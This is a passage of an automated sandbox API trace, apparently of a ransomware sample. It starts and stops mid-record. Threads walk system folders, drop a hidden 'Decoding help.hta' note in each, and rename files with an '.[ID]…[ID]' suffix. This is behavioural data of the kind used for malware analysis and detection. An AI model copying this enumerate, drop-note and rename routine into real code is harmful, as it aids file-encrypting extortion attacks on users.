returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\*.*" [0060.138] GlobalMemoryStatus (in: lpBuffer=0x180dfd10 | out: lpBuffer=0x180dfd10) [0060.825] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2aa18dc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7ac [0064.500] CloseHandle (hObject=0x7ac) returned 1 [0064.500] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0x180dfd30 | out: lpFindFileData=0x180dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6NG60CXZ.9GJ", cAlternateFileName="")) returned 0 [0064.500] FindClose (in: hFindFile=0x671430 | out: hFindFile=0x671430) returned 1 Thread: id = 961 os_tid = 0x850 [0060.139] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\*.*", lpFindFileData=0x181dfd30 | out: lpFindFileData=0x181dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22ad0a6d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8890 [0060.139] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.139] FindNextFileW (in: hFindFile=0x5d8890, lpFindFileData=0x181dfd30 | out: lpFindFileData=0x181dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22ad0a6d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.139] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.139] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.139] FindNextFileW (in: hFindFile=0x5d8890, lpFindFileData=0x181dfd30 | out: lpFindFileData=0x181dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xb92, dwReserved0=0x0, dwReserved1=0x0, cFileName="flyout.css", cAlternateFileName="")) returned 1 [0060.139] lstrcpyW (in: lpString1=0x1135c380, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\*.*" [0060.139] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\*.*") returned 80 [0060.139] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\Decoding help.hta" [0060.139] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\decoding help.hta")) returned 0xffffffff [0060.140] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0061.454] WriteFile (in: hFile=0x348, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x181dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x181dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.455] CloseHandle (hObject=0x348) returned 1 [0061.455] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.455] lstrcmpiW (lpString1="Decoding help.hta", lpString2="flyout.css") returned -1 [0061.455] lstrlenW (lpString="flyout.css") returned 10 [0061.455] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\*.*" [0061.455] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\*.*") returned 80 [0061.455] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\", lpString2="flyout.css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\flyout.css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\flyout.css" [0061.455] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\flyout.css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\flyout.css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\flyout.css" [0061.455] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\flyout.css", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\flyout.css.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\flyout.css.[ID]g9uZrLhJaygpwRm1[ID]" [0061.455] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\flyout.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\flyout.css"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\flyout.css.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\flyout.css.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.516] FindNextFileW (in: hFindFile=0x5d8890, lpFindFileData=0x181dfd30 | out: lpFindFileData=0x181dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSSFeeds.css", cAlternateFileName="")) returned 1 Thread: id = 962 os_tid = 0x820 [0060.140] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\*.*", lpFindFileData=0x1855fd30 | out: lpFindFileData=0x1855fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5d30 [0062.512] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.512] FindNextFileW (in: hFindFile=0x5a5d30, lpFindFileData=0x1855fd30 | out: lpFindFileData=0x1855fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.512] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.512] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.512] FindNextFileW (in: hFindFile=0x5a5d30, lpFindFileData=0x1855fd30 | out: lpFindFileData=0x1855fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd5024ea0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x2760, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOInstallerUI.dll", cAlternateFileName="VSTOIN~1.DLL")) returned 1 Thread: id = 963 os_tid = 0xc7c [0060.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*", lpFindFileData=0x18a5fd30 | out: lpFindFileData=0x18a5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803d8e97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803d8e97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbcb58 [0060.141] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.141] FindNextFileW (in: hFindFile=0x10fbcb58, lpFindFileData=0x18a5fd30 | out: lpFindFileData=0x18a5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803d8e97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803d8e97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.141] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.141] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.141] FindNextFileW (in: hFindFile=0x10fbcb58, lpFindFileData=0x18a5fd30 | out: lpFindFileData=0x18a5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2273aeba, ftCreationTime.dwHighDateTime=0x1ca03fc, ftLastAccessTime.dwLowDateTime=0x2273aeba, ftLastAccessTime.dwHighDateTime=0x1ca03fc, ftLastWriteTime.dwLowDateTime=0x5d093be9, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec3, dwReserved0=0x0, dwReserved1=0x0, cFileName="FrameworkList.xml", cAlternateFileName="")) returned 1 [0060.141] lstrcpyW (in: lpString1=0x42b0868, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*" [0060.141] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*") returned 81 [0060.141] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\Decoding help.hta" [0060.141] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\decoding help.hta")) returned 0xffffffff [0060.142] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0061.456] WriteFile (in: hFile=0x348, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x18a5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x18a5fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.458] CloseHandle (hObject=0x348) returned 1 [0061.458] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.458] lstrcmpiW (lpString1="Decoding help.hta", lpString2="FrameworkList.xml") returned -1 [0061.458] lstrlenW (lpString="FrameworkList.xml") returned 17 [0061.458] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*" [0061.458] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*") returned 81 [0061.458] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\", lpString2="FrameworkList.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml" [0061.458] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml" [0061.458] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0061.458] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\frameworklist.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\frameworklist.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.458] FindNextFileW (in: hFindFile=0x10fbcb58, lpFindFileData=0x18a5fd30 | out: lpFindFileData=0x18a5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2273aeba, ftCreationTime.dwHighDateTime=0x1ca03fc, ftLastAccessTime.dwLowDateTime=0x2273aeba, ftLastAccessTime.dwHighDateTime=0x1ca03fc, ftLastWriteTime.dwLowDateTime=0x5d093be9, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec3, dwReserved0=0x0, dwReserved1=0x0, cFileName="FrameworkList.xml", cAlternateFileName="")) returned 0 [0061.458] FindClose (in: hFindFile=0x10fbcb58 | out: hFindFile=0x10fbcb58) returned 1 Thread: id = 964 os_tid = 0x928 [0060.142] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*", lpFindFileData=0x18b9fd30 | out: lpFindFileData=0x18b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fb9d98 [0060.142] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.142] FindNextFileW (in: hFindFile=0x10fb9d98, lpFindFileData=0x18b9fd30 | out: lpFindFileData=0x18b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.142] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.142] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.142] FindNextFileW (in: hFindFile=0x10fb9d98, lpFindFileData=0x18b9fd30 | out: lpFindFileData=0x18b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x932b6af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x932b6af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x0, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0060.142] lstrcpyW (in: lpString1=0x42b8870, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*" [0060.142] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*") returned 95 [0060.142] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\Decoding help.hta" [0060.142] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\decoding help.hta")) returned 0xffffffff [0060.142] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x960 [0061.459] WriteFile (in: hFile=0x960, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x18b9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x18b9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.460] CloseHandle (hObject=0x960) returned 1 [0062.528] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 965 os_tid = 0x99c [0060.143] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*", lpFindFileData=0x18f1fd30 | out: lpFindFileData=0x18f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fb9dd8 [0060.143] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.143] FindNextFileW (in: hFindFile=0x10fb9dd8, lpFindFileData=0x18f1fd30 | out: lpFindFileData=0x18f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.143] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.143] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.143] FindNextFileW (in: hFindFile=0x10fb9dd8, lpFindFileData=0x18f1fd30 | out: lpFindFileData=0x18f1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a152a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2a152a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0060.143] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*" [0060.143] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*") returned 95 [0060.143] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\Decoding help.hta" [0060.143] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\decoding help.hta")) returned 0xffffffff [0060.143] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x960 [0061.460] WriteFile (in: hFile=0x960, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x18f1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x18f1fcf8*=0x78e, lpOverlapped=0x0) 